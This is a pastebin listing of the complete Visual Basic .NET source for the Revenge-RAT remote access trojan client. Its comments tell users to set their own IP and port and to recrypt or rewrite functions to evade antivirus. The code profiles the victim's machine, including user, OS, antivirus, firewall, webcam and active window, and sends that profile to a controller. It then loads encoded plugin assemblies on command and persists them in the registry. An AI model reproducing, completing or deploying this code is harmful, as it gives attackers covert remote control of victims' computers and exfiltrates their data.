SHOW:
|
|
- or go back to the newest paste.
1 | ' Fixed By NYAN CAT \\ NOV 25TH, 2018 | |
2 | ||
3 | ' Revenge-RAT Client Source Code v0.3 | |
4 | ' By N A P O L E O N | |
5 | ' You can update/Crypt the client again, learn if you want , some codes typed direct for beginners | |
6 | ' if you want good result in runtime vs AV, rewrite some functions much as you can | |
7 | ' Last edit: 2016/12/9 | |
8 | Imports System.Management, Microsoft.VisualBasic.Devices, System.Collections.Generic, System.Diagnostics, System.Windows.Forms, System.Globalization, System.IO.Compression, System.Net, System.Threading, Microsoft.Win32, System.Text, System.IO | |
9 | ||
10 | Public Class Atomic | |
11 | Public OW As Boolean = False | |
12 | Public C As Object = Nothing | |
13 | Public Cn As Boolean = False | |
14 | Public SC = New Thread(AddressOf MAC, 1) | |
15 | Public PT As New Thread(AddressOf Pin) | |
16 | Public I As Integer = 1 | |
17 | Public MS As Integer = 0 | |
18 | ||
19 | '######################################################## | |
20 | Public Hosts As String() = Split("127.0.0.1,", ",") 'Your IP | |
21 | Public Ports As String() = Split("333,", ",") 'Your Port | |
22 | Public Shared Key As String = "Revenge-RAT" 'Your Key | |
23 | '######################################################## | |
24 | ||
25 | Public ID As String = "TllBTi1DQVQ=" | |
26 | Public MUTEX As String = "RV_MUTEX-FZMONFueOciq" | |
27 | Public H As Integer = 0 | |
28 | Public P As Integer = 0 | |
29 | Public Shared SPL As String = "*-]NK[-*" | |
30 | Public Shared App As String = Application.ExecutablePath | |
31 | Public Shared SCG As New Atomic | |
32 | Public Shared DI As ComputerInfo = New ComputerInfo | |
33 | Public Shared MT As Mutex | |
34 | Public Shared Tick As System.Threading.Timer = Nothing | |
35 | ||
36 | ||
37 | Shared Sub Main() | |
38 | SCG.Execute() | |
39 | End Sub | |
40 | ||
41 | Sub Execute() | |
42 | Try : MT = New Mutex(True, MUTEX, OW) : If Not OW Then End : AddHandler Application.ApplicationExit, Sub() MT.ReleaseMutex() | |
43 | Catch : End Try | |
44 | SC.Start() : PT.Start() | |
45 | End Sub | |
46 | ||
47 | Sub Pin() | |
48 | RE: If I = 0 Then : MS += 1 : End If : Thread.Sleep(1) : GoTo RE | |
49 | End Sub | |
50 | ||
51 | Sub data(ByVal b As Byte()) ' receive commands from RV-RAT | |
52 | Dim Rev As String() = Split(BS(b), Key) | |
53 | If Rev(0) = "PNC" Then | |
54 | I = 0 | |
55 | Send("PNC") | |
56 | ElseIf Rev(0) = "P" Then | |
57 | I = 1 | |
58 | Send("P" & Key & MS) | |
59 | MS = 0 | |
60 | Send("W" & Key & GAW()) | |
61 | ElseIf Rev(0) = "IE" Then ' Ask about plugin | |
62 | If Not Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & Rev(1), True) Is Nothing Then : Try : INV(Hosts(H), Ports(P), Rev(4), Rev(5), Encode(Decode(ID) & "_" & HWD()), Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & Rev(1), Rev(1), Nothing).ToString, Rev(2), Rev(3), Rev(1), True) : Catch : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End Try : Else : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End If | |
63 | ElseIf Rev(0) = "LP" Then ' invoke plugin | |
64 | INV(Hosts(H), Ports(P), Rev(1), Rev(2), Encode(Decode(ID) & "_" & HWD()), Rev(3), Rev(4), Rev(5), Rev(6), Rev(7)) | |
65 | ElseIf Rev(0) = "UNV" Then ' uninstall - restart - close .. etc | |
66 | LA(Rev(1)).CreateInstance(Rev(2)).UNI(Encode(MUTEX), Rev(3), Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Rev(4), Rev(5), App, Rev(6), Rev(7), Rev(8), Rev(9), Rev(10), Rev(11), Rev(12), Rev(13)) | |
67 | End If | |
68 | End Sub | |
69 | ||
70 | Public Function INV(ByVal H As String, P As String, N As String, C As String, ID As String, Bytes As String, S As Integer, M As Boolean, MD5 As String, B As Boolean) ' invoke plugin | |
71 | LA(Bytes).CreateInstance(N & "." & C, True).Start(ID, S, H, P, Key, SPL) : If M Then : Try : If Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & MD5, True) Is Nothing Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : Catch : End Try : If B = False Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : End If | |
72 | End Function | |
73 | ||
74 | Public Function LA(B As String) ' load assembly | |
75 | Return Reflection.Assembly.Load(Decompress(Convert.FromBase64String(B))) | |
76 | End Function | |
77 | ||
78 | Public Function IR(ByVal P As String, N As String, B As String) ' add reg value | |
79 | Try : Registry.SetValue(P, N, B) : Catch : End Try | |
80 | End Function | |
81 | ||
82 | Sub MAC() | |
83 | ||
84 | Dim M As Object = New MemoryStream | |
85 | Dim lp As Integer = 0 | |
86 | re: | |
87 | Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try | |
88 | Try | |
89 | If C Is Nothing Then GoTo e | |
90 | If C.Client.Connected = False Then GoTo e | |
91 | If Cn = False Then GoTo e | |
92 | lp += 1 | |
93 | If lp > 300 Then | |
94 | lp = 0 | |
95 | If C.Client.Poll(-1, Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e | |
96 | End If | |
97 | If C.Available > 0 Then | |
98 | Dim B(C.Available - 1) As Byte | |
99 | C.Client.Receive(B, 0, B.Length, Sockets.SocketFlags.None) | |
100 | M.Write(B, 0, B.Length) | |
101 | rr: | |
102 | If BS(M.ToArray).Contains(SPL) Then | |
103 | Dim A As Array = fx(M.ToArray, SPL) | |
104 | Dim T As New Thread(AddressOf data) | |
105 | T.Start(A(0)) | |
106 | M.Dispose() | |
107 | M = New IO.MemoryStream | |
108 | If A.Length = 2 Then | |
109 | M.Write(A(1), 0, A(1).length) | |
110 | GoTo rr | |
111 | End If | |
112 | End If | |
113 | End If | |
114 | Catch | |
115 | GoTo e | |
116 | End Try | |
117 | Thread.CurrentThread.Sleep(1) | |
118 | GoTo re | |
119 | e: | |
120 | Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try | |
121 | Cn = False | |
122 | Try | |
123 | C.Client.Disconnect(False) | |
124 | Catch | |
125 | End Try | |
126 | Try | |
127 | M.Dispose() | |
128 | Catch | |
129 | End Try | |
130 | Try | |
131 | Tick.Dispose() | |
132 | Catch | |
133 | End Try | |
134 | M = New MemoryStream | |
135 | Dim IC As Boolean = False | |
136 | For Count As Integer = 0 To Hosts.Length - 2 | |
137 | Try | |
138 | C = New Sockets.TcpClient() With {.ReceiveTimeout = -1, .SendTimeout = -1, .SendBufferSize = 999999, .ReceiveBufferSize = 999999} | |
139 | lp = 0 | |
140 | CK().Connect(Hosts(Count), Ports(Count)) | |
141 | Cn = True | |
142 | ||
143 | Send("Information" & Key & ID & Key & Encode("_" & HWD()) & Key & IP() & Key & Encode(Environment.MachineName & " / " & Environment.UserName) & Key & CIVC() & Key & Encode(DI.OSFullName & " " & OP()) & Key & Encode(MP()) & Key & DI.TotalPhysicalMemory & Key & GetProduct("Select * from AntiVirusProduct") & Key & GetProduct("SELECT * FROM FirewallProduct") & Key & Ports(P) & Key & GAW() & Key & Encode(CultureInfo.CurrentCulture.Name) & Key & "False") ' RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread | |
144 | H = Count | |
145 | P = Count | |
146 | IC = True | |
147 | Dim T As New TimerCallback(AddressOf Ping) | |
148 | Tick = New Threading.Timer(T, Nothing, 10000, 30000) | |
149 | GoTo re | |
150 | Catch | |
151 | Thread.Sleep(5000) ' replace it for reconnect time in ms , like 2500 or 5000 | |
152 | H = 0 | |
153 | P = 0 | |
154 | End Try | |
155 | Next | |
156 | If IC = True Then | |
157 | IC = False | |
158 | GoTo e | |
159 | End If | |
160 | GoTo re | |
161 | End Sub | |
162 | ||
163 | Sub Ping() | |
164 | Send("alive??") | |
165 | End Sub | |
166 | ||
167 | Function CK() | |
168 | Return C.Client | |
169 | End Function | |
170 | ||
171 | Public Sub Send(ByVal b As Byte()) | |
172 | If Cn = False Then Exit Sub | |
173 | Try | |
174 | Dim r As Object = New MemoryStream | |
175 | r.Write(b, 0, b.Length) | |
176 | r.Write(SB(SPL), 0, SPL.Length) | |
177 | C.Client.SendBufferSize = b.Length | |
178 | C.Client.Poll(-1, Net.Sockets.SelectMode.SelectWrite) | |
179 | C.Client.Send(r.ToArray, 0, r.Length, Sockets.SocketFlags.None) | |
180 | r.Dispose() | |
181 | Catch | |
182 | Cn = False | |
183 | End Try | |
184 | End Sub | |
185 | ||
186 | Public Sub Send(ByVal S As String) | |
187 | Send(SB(S)) | |
188 | End Sub | |
189 | ||
190 | Public Function IP() | |
191 | Try : Return CType(Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0), IPAddress).ToString() : Catch : Return "????" : End Try | |
192 | End Function | |
193 | ||
194 | Private Declare Function GVI Lib "kernel32" Alias "GetVolumeInformationA" (ByVal IP As String, ByVal V As String, ByVal T As Integer, ByRef H As Integer, ByRef Q As Integer, ByRef G As Integer, ByVal J As String, ByVal X As Integer) As Integer : Private Declare Function GFW Lib "user32" Alias "GetForegroundWindow" () As IntPtr : Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As IntPtr, ByVal lpString As StringBuilder, ByVal cch As Integer) As Integer : Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean | |
195 | <Runtime.InteropServices.DllImport("psapi")> | |
196 | Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean | |
197 | End Function | |
198 | ||
199 | Public Function HWD() As String | |
200 | Try : Dim HSN As Integer : GVI(Environ("SystemDrive") & "\", Nothing, Nothing, HSN, 0, 0, Nothing, Nothing) : Return Hex(HSN) : Catch : Return "ERR" : End Try | |
201 | End Function | |
202 | ||
203 | Public Function CIVC() As String | |
204 | Try : For i As Integer = 0 To 4 : If capGetDriverDescriptionA(i, Space(100), 100, Nothing, 100) Then : Return "Yes" : End If : Next : Catch : End Try : Return "No" | |
205 | End Function | |
206 | ||
207 | Public Shared Function OP() As String | |
208 | Try : For Each SC As ManagementObject In New ManagementObjectSearcher("select * from Win32_Processor").[Get]() : Return Convert.ToInt32(SC("AddressWidth")) : Next : Catch : Return "????" : End Try | |
209 | End Function | |
210 | ||
211 | Public Function GetProduct(ByVal Product As String) As String | |
212 | Try : Dim PN As String = String.Empty : For Each AV As ManagementObject In New ManagementObjectSearcher("root\SecurityCenter" & IIf(DI.OSFullName.Contains("XP"), "", "2").ToString, Product).Get : PN &= AV("displayName").ToString : Next : If Not PN = String.Empty Then : Return Encode(PN) : Else : Return Encode("N/A") : End If : Catch : Return Encode("N/A") : End Try | |
213 | End Function | |
214 | ||
215 | Public Function MP() | |
216 | Try : Return Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString : Catch : Return "????" : End Try | |
217 | End Function | |
218 | ||
219 | Public Function GAW() As String | |
220 | Dim W As New StringBuilder(256) : GetWindowText(GFW(), W, W.Capacity) : Return Encode(W.ToString()) | |
221 | End Function | |
222 | ||
223 | Function SB(ByVal s As String) As Byte() | |
224 | Return Encoding.Default.GetBytes(s) | |
225 | End Function | |
226 | ||
227 | Function BS(ByVal b As Byte()) As String | |
228 | Return Encoding.Default.GetString(b) | |
229 | End Function | |
230 | ||
231 | Function fx(ByVal b As Byte(), ByVal WRD As String) As Array | |
232 | Dim a As New List(Of Byte()), M As New MemoryStream, MM As New MemoryStream, T As String() = Split(BS(b), WRD) : M.Write(b, 0, T(0).Length) : MM.Write(b, T(0).Length + WRD.Length, b.Length - (T(0).Length + WRD.Length)) : a.Add(M.ToArray) : a.Add(MM.ToArray) : M.Dispose() : MM.Dispose() : Return a.ToArray | |
233 | End Function | |
234 | ||
235 | Public Function Decompress(data As Byte()) As Byte() | |
236 | Dim input As New MemoryStream() : input.Write(data, 0, data.Length) : input.Position = 0 | |
237 | Dim gzip As New GZipStream(input, CompressionMode.Decompress, True), output As New MemoryStream(), buff As Byte() = New Byte(63) {}, read As Integer = -1 | |
238 | read = gzip.Read(buff, 0, buff.Length) : While read > 0 : output.Write(buff, 0, read) : read = gzip.Read(buff, 0, buff.Length) : End While : gzip.Close() : Return output.ToArray() | |
239 | End Function | |
240 | ||
241 | Public Function Encode(ByVal Input As String) | |
242 | Return Convert.ToBase64String(Encoding.UTF8.GetBytes(Input)) | |
243 | End Function | |
244 | ||
245 | Public Function Decode(ByVal Input As String) | |
246 | Return Encoding.UTF8.GetString(Convert.FromBase64String(Input)) | |
247 | End Function | |
248 | ||
249 | End Class |